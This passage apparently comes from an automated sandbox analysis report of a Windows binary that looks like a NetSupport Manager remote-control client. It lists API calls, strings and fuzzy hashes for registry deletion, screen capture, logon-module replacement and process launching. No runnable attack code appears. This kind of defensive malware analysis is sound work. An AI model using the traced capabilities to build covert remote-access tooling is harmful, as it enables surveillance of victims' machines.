                                                                                                                          • Part of subcall function 00AFB0E0: RegDeleteKeyW.ADVAPI32(?,?), ref: 00AFB1AB
                                                                                                                        Strings
                                                                                                                        • SYSTEM\CurrentControlSet\Enum, xrefs: 00AFB241
                                                                                                                        • Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d), xrefs: 00AFB229
                                                                                                                        • {7a0787c8-fa7e-4c06-861d-593b3129b14c}, xrefs: 00AFB200
                                                                                                                        • {6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}, xrefs: 00AFB254
                                                                                                                        • SYSTEM\CurrentControlSet\Control\DeviceClasses, xrefs: 00AFB1E7
                                                                                                                        • RecurseDeleteKey FAILED (%d), xrefs: 00AFB213, 00AFB267
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen_wprintf$Enum$Delete
                                                                                                                        • String ID: Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d)$RecurseDeleteKey FAILED (%d)$SYSTEM\CurrentControlSet\Control\DeviceClasses$SYSTEM\CurrentControlSet\Enum${6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}${7a0787c8-fa7e-4c06-861d-593b3129b14c}
                                                                                                                        • API String ID: 2065481808-1050689862
                                                                                                                        • Opcode ID: 8d1c5f88ed99f4e64045f5c5577771253406aacee28dc4e698a1eca3e8ca35cc
                                                                                                                        • Instruction ID: a01d4f90d9b5248353917428d7c8d777e49e3e913ea68f6649f9b5904aa774cd
                                                                                                                        • Opcode Fuzzy Hash: 8d1c5f88ed99f4e64045f5c5577771253406aacee28dc4e698a1eca3e8ca35cc
                                                                                                                        • Instruction Fuzzy Hash: 9F01C876A5021CB6EA1097D4AD43FBE72BCDB54741F200094FF04E21D2EBA4AE0057B1
                                                                                                                        APIs
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B09091
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B090A1
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B0914E
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B09155
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B0917C
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Object$DeleteFreeLockUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1970483154-0
                                                                                                                        • Opcode ID: 75aa6a97788406a18e766a70095a8915ef42851fa4f75560c6e4cd34529028a3
                                                                                                                        • Instruction ID: 201f4434819588a6a7b27c1976142e95e0541fea04639deda597559a34c8599b
                                                                                                                        • Opcode Fuzzy Hash: 75aa6a97788406a18e766a70095a8915ef42851fa4f75560c6e4cd34529028a3
                                                                                                                        • Instruction Fuzzy Hash: CAB1C771E04259AFCB15CFA8D8859EEBFF5EF59300F188199E844AB392D734D905CBA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__wcsicoll__wcsnicmp_fgetws
                                                                                                                        • String ID: .scp$IsA()$Scripts.nsm$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 218992925-33230323
                                                                                                                        • Opcode ID: 50225db49434a829f6f26b931bbbe7a8b77861e4e226355a6a434a55d3c921f0
                                                                                                                        • Instruction ID: 5340f17ebc52850524724736fe746c4a569f10e27ad8614f70e8f7027864768e
                                                                                                                        • Opcode Fuzzy Hash: 50225db49434a829f6f26b931bbbe7a8b77861e4e226355a6a434a55d3c921f0
                                                                                                                        • Instruction Fuzzy Hash: 5A51E271A00302ABDB10EB24EC52BA673E4EF95700F1445E8F909DB296FA75E944CB99
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,00B71B70,?), ref: 00B2247C
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000041), ref: 00B224AE
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B224ED
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B22505
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,00B71B58), ref: 00B2251E
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B225A3
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000001,?,00000041), ref: 00B225BA
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B225D1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpenwsprintf$DeleteLocalTimeValue__wcsicoll_mallocwvsprintf
                                                                                                                        • String ID: HackNetMeeting
                                                                                                                        • API String ID: 943488453-1163810582
                                                                                                                        • Opcode ID: df2d53d3b83172b46db29bc58fc984f10f424d24326be89395a0a62334e4867a
                                                                                                                        • Instruction ID: ad6c60e8bc69e289b3b27981ba38cd72fe927192b23aca681c7c515ddddced55
                                                                                                                        • Opcode Fuzzy Hash: df2d53d3b83172b46db29bc58fc984f10f424d24326be89395a0a62334e4867a
                                                                                                                        • Instruction Fuzzy Hash: E3412171A00128ABDB24DB55DC46FEA73B8FB58700F4085D9F609D7150DEB4AE85CFA1
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B14550
                                                                                                                        • GetDC.USER32(00000000), ref: 00B14579
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B14588
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1458D
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B145A5
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B145B0
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B145BE
                                                                                                                        • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00B1460C
                                                                                                                        • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00B14624
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1462F
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1463A
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B14647
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1464A
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B1464F
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3950507155-0
                                                                                                                        • Opcode ID: 3971abfdbd5ad0a4d10c6ff87728921905f3cbd7c3b0563356b2398d928bf73b
                                                                                                                        • Instruction ID: f49a4c7f8d6bfffaa854a0a63be53478403aea8b6e3295c134d181ed06fbdc98
                                                                                                                        • Opcode Fuzzy Hash: 3971abfdbd5ad0a4d10c6ff87728921905f3cbd7c3b0563356b2398d928bf73b
                                                                                                                        • Instruction Fuzzy Hash: 2541D9B5A00209BFEB14DFA4DC89FBF7BBDEB59711F104159F905A3290DAB4AD408B60
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep_wcschr$DestroyMessagePostWindow_fputs
                                                                                                                        • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        • API String ID: 2961146616-2848714714
                                                                                                                        • Opcode ID: cf517f40f6d1f21bc97d02bd784e7c8c7087893266d92670f205baaef7733399
                                                                                                                        • Instruction ID: 3d4eb8d2938e61d92796f3c3725584edf0baae30d6b1d766126a794ded5f708f
                                                                                                                        • Opcode Fuzzy Hash: cf517f40f6d1f21bc97d02bd784e7c8c7087893266d92670f205baaef7733399
                                                                                                                        • Instruction Fuzzy Hash: 07312872D4122097DB307B69BC86E6E32F4EB40710F0946F5F46E572D2EEB0998586A3
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A4AD
                                                                                                                        • wsprintfW.USER32 ref: 00B1A4CF
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A4DF
                                                                                                                          • Part of subcall function 00B155B0: GetTickCount.KERNEL32 ref: 00B15618
                                                                                                                        • GetModuleHandleW.KERNEL32(NSMTRACE.DLL), ref: 00B1A4F7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceFlush), ref: 00B1A507
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A54B
                                                                                                                        • GetVersion.KERNEL32 ref: 00B1A556
                                                                                                                        • SetLastError.KERNEL32(?), ref: 00B1A57D
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B1A598
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugErrorLastOutputString$AddressCountHandleModuleProcStateTickVersionwsprintf
                                                                                                                        • String ID: Exception caught at %x. Trying minidump.$NSMTRACE.DLL$NSMTraceFlush
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fgetc_fseek$__filbuf__fread_nolock__lock_file_free_malloc
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B18DB0: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B18DD7
                                                                                                                          • Part of subcall function 00B39583: __wfsopen.LIBCMT ref: 00B39590
                                                                                                                        • _wcstoul.LIBCMT ref: 00AE2999
                                                                                                                          • Part of subcall function 00B39491: wcstoxl.LIBCMT ref: 00B394A1
                                                                                                                        • _wcschr.LIBCMT ref: 00AE29F2
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2AC4
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2AE8
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE2B01
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2B23
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2B82
                                                                                                                        • _wcstok.LIBCMT ref: 00AE2B98
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$EnvironmentExpandStrings__wcsicoll__wfsopen_wcstok_wcstoulwcstoxl
                                                                                                                        • String ID: %s.%04d.%s$Client$Untitled
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06698
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B066AD
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B066B6
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B066C0
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B066D5
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B0670E
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B06719
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00B0673D
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B06748
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B06755
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B0675C
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B06763
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06768
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • IsDlgButtonChecked.USER32(?,00000428), ref: 00B24604
                                                                                                                        • EndDialog.USER32(?,00000428), ref: 00B24617
                                                                                                                        • GetDlgItem.USER32(?,00000427), ref: 00B24635
                                                                                                                        • GetDlgItem.USER32(?,00000428), ref: 00B2463F
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00B24664
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00B24681
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00B2468D
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00B2469C
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00B246A4
                                                                                                                        • GetDlgItem.USER32(?,00000426), ref: 00B246AE
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B246B1
                                                                                                                        • CheckDlgButton.USER32(?,00000428,00000001), ref: 00B246C7
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00B246D0
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnableItemShow$Button$CheckCheckedDialogForeground
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06798
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B067B8
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B067C2
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B067C8
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B067D6
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B067E5
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B067F0
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00B06816
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B06821
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B0682A
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00B0683A
                                                                                                                        • DeleteDC.GDI32(?), ref: 00B06840
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06845
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00AE2337,?), ref: 00AE86C6
                                                                                                                        • _malloc.LIBCMT ref: 00AE870D
                                                                                                                        • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?,00000000,00AE2337,?), ref: 00AE874D
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE8783
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumInfoQueryValue__wcsicoll_malloc
                                                                                                                        • String ID: ..\CTL32\Config.cpp$_tcslen (k.m_k) < _tsizeof (m_szSectionAndKey)$err == 0$maxname < _tsizeof (m_szSectionAndKey)
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\util.cpp, xrefs: 00B1C21C
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h, xrefs: 00B1C1C1
                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 00B1C195
                                                                                                                        • MS Shell Dlg, xrefs: 00B1C16F
                                                                                                                        • hSubstitutedFont, xrefs: 00B1C221
                                                                                                                        • IsA(), xrefs: 00B1C1C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateFontIndirectStock__wcsicoll_memset
                                                                                                                        • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hSubstitutedFont
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000100,00B8CB80), ref: 00B2E682
                                                                                                                        • PostMessageW.USER32(?,000003E1,?,00000000), ref: 00B2EDE1
                                                                                                                        • DestroyWindow.USER32(?), ref: 00B2EDEE
                                                                                                                        • _fputs.LIBCMT ref: 00B2EE3D
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00B2EE58
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDestroyDirectoryMessagePostSleepWindow_fputs
                                                                                                                        • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B18BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18C1C
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 00B18C5F
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 00B18CB7
                                                                                                                        • wsprintfW.USER32 ref: 00B1EDEC
                                                                                                                        • PlaySoundW.WINMM(?,?,?), ref: 00B1EED8
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • wsprintfW.USER32 ref: 00B1EE43
                                                                                                                        • _memset.LIBCMT ref: 00B1EE50
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 00B1EE88
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1EEA0
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B1EEB3
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B1EEBC
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFolderHandlePath_memsetwsprintf$CreateFileModuleNameObjectOpenPlayProcessSingleSoundVersionWait_wcsncpy
                                                                                                                        • String ID: %s %s$%sPlaySound.exe$D
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$BuildCatchMatchObjectType
                                                                                                                        • String ID: MOC$RCC$csm$csm
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalLock
                                                                                                                        • String ID: ..\CTL32\pcibmp.cpp$lpDIBHdr
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 00B154F6
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B154FD
                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 00B15513
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00B15531
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 00B1553B
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B1554E
                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),00B876D4,00000004,?), ref: 00B1556D
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B15594
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B1559B
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                                        • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(USER32,?,?,00AFEA6F), ref: 00AEED89
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00AEED9D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00AEEDAA
                                                                                                                        • GetProcAddress.KERNEL32(?,EnumDisplayDevicesW), ref: 00AEEDB7
                                                                                                                        • GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 00AEEDC4
                                                                                                                        • _memset.LIBCMT ref: 00AEEDD4
                                                                                                                          • Part of subcall function 00AEE820: _memset.LIBCMT ref: 00AEE843
                                                                                                                          • Part of subcall function 00AEE820: _memset.LIBCMT ref: 00AEE875
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$_memset$LibraryLoad
                                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoW$MonitorFromRect$USER32
                                                                                                                        • API String ID: 1187747625-2044714463
                                                                                                                        • Opcode ID: 830ca3ca2169687e1318f3826a4d8eb830209283ef4f8c583774ff8e6f84a449
                                                                                                                        • Instruction ID: 9839f97a9f868b138b8c39b769da7e04a005e6885dba642db73683a554f622e5
                                                                                                                        • Opcode Fuzzy Hash: 830ca3ca2169687e1318f3826a4d8eb830209283ef4f8c583774ff8e6f84a449
                                                                                                                        • Instruction Fuzzy Hash: F6F01271A407046BC720AF7A9D45E47F7E8EF94B10B11486EF189E32A0DABCA4408F95
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,5E06C67B), ref: 00B0F466
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 00B0F4A7
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,00000000,00000000,00000000,?), ref: 00B0F4E7
                                                                                                                        • GetLastError.KERNEL32 ref: 00B0F625
                                                                                                                        • __wcsdup.LIBCMT ref: 00B0F6F4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPath$ErrorFileLastModuleName__wcsdup
                                                                                                                        • String ID: %s not created, e=%d$Access to %s = %d$Created folder (or exists) %s$IsA()$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 3726295009-2115974479
                                                                                                                        • Opcode ID: f213491872c8690049a229ae859534883b34683bd6530f179aa42863ce29f4f0
                                                                                                                        • Instruction ID: 5a105259ab70c4029aa72eda49499c58d2ff343f4245b7592227ac272f1469d9
                                                                                                                        • Opcode Fuzzy Hash: f213491872c8690049a229ae859534883b34683bd6530f179aa42863ce29f4f0
                                                                                                                        • Instruction Fuzzy Hash: 3781D0B1A0021A9ACB30DF54CC51BFAB7F5EF94314F1442E8E809A36D1EB71AA54CF91
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFE7F3
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AFE829
                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00AFE859
                                                                                                                        • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 00AFE87A
                                                                                                                        • VerQueryValueW.VERSION(00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 00AFE897
                                                                                                                        • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904b0\ProductVersion,?,?,00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 00AFE8B4
                                                                                                                          • Part of subcall function 00B3B767: __isdigit_l.LIBCMT ref: 00B3B78C
                                                                                                                        Strings
                                                                                                                        • \StringFileInfo\080904b0\ProductVersion, xrefs: 00AFE891
                                                                                                                        • \gdihook5.dll, xrefs: 00AFE814
                                                                                                                        • \StringFileInfo\040904b0\ProductVersion, xrefs: 00AFE8AE
                                                                                                                        • \StringFileInfo\040904e4\ProductVersion, xrefs: 00AFE874
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$FileInfoVersion$DirectorySizeSystem__isdigit_l
                                                                                                                        • String ID: \StringFileInfo\040904b0\ProductVersion$\StringFileInfo\040904e4\ProductVersion$\StringFileInfo\080904b0\ProductVersion$\gdihook5.dll
                                                                                                                        • API String ID: 3509900508-296312680
                                                                                                                        • Opcode ID: 8c26e1196c5395fa9bb3862602f196ea440f0bf80e4a8f9d0065b9f842ddb8e6
                                                                                                                        • Instruction ID: 1479aa9f7706510d086f3b38df602d245ef71cd30b3b202b14791ad5aaa8a98a
                                                                                                                        • Opcode Fuzzy Hash: 8c26e1196c5395fa9bb3862602f196ea440f0bf80e4a8f9d0065b9f842ddb8e6
                                                                                                                        • Instruction Fuzzy Hash: CB51D9B1D0022996DB30EBA48D85BBBB2F8AF54344F1445E9FD49A3251F774DE80C7A2
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 00B24E54
                                                                                                                        • _memmove.LIBCMT ref: 00B24EAB
                                                                                                                        • wsprintfW.USER32 ref: 00B24EC2
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B24F50
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 00B24FFF
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Value_memmove$EnumLocalTime_mallocwvsprintf
                                                                                                                        • String ID: "$%s exists$%s=%s, err=%d$Found %s$\%s
                                                                                                                        • API String ID: 1908247923-3597523911
                                                                                                                        • Opcode ID: ecfae86d24f24dd669a6e065eedb8261c8164dca35a9469531b879c1a212a524
                                                                                                                        • Instruction ID: f974a0df77ce59953aa22e4665669ec447b3a92aa9d20bbbdb6d9ca6549ba0f9
                                                                                                                        • Opcode Fuzzy Hash: ecfae86d24f24dd669a6e065eedb8261c8164dca35a9469531b879c1a212a524
                                                                                                                        • Instruction Fuzzy Hash: 39519E769001299ADF24DB94DC85EEE73B8EF94300F1085D9F90DA7151EFB09E488FA1
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B30F96
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B31037
                                                                                                                        • GetLastError.KERNEL32 ref: 00B3104B
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B310DA
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Copy$ErrorLastModuleName
                                                                                                                        • String ID: .new$Copy %s to %s$Copy failed - pcigina in use$pcigina
                                                                                                                        • API String ID: 2850203897-1136079111
                                                                                                                        • Opcode ID: e84565485fc8e68ff249a8f1dbb5671389f4946ce16c8002d9d0a686c339c3b4
                                                                                                                        • Instruction ID: 1814308fc7eac1d75e81875d527cbe150d9d9c83580c8525c56f958d57869fa8
                                                                                                                        • Opcode Fuzzy Hash: e84565485fc8e68ff249a8f1dbb5671389f4946ce16c8002d9d0a686c339c3b4
                                                                                                                        • Instruction Fuzzy Hash: 3041D6B694021997CB30AB58CD56BEB33F8EF94700F1045E8FB0A972C1EA755E45CB91
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00AE4113
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00AE4145
                                                                                                                        • __fassign.LIBCMT ref: 00AE418C
                                                                                                                          • Part of subcall function 00B3945D: wcstoxl.LIBCMT ref: 00B3946D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AE41A3
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE41B5
                                                                                                                          • Part of subcall function 00B137C0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?), ref: 00B137E0
                                                                                                                        Strings
